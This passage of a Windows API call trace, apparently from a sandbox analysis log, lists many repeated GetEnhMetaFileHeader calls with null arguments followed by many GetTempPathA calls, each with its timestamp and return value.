lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.897] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.917] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.918] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.919] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.920] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.921] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 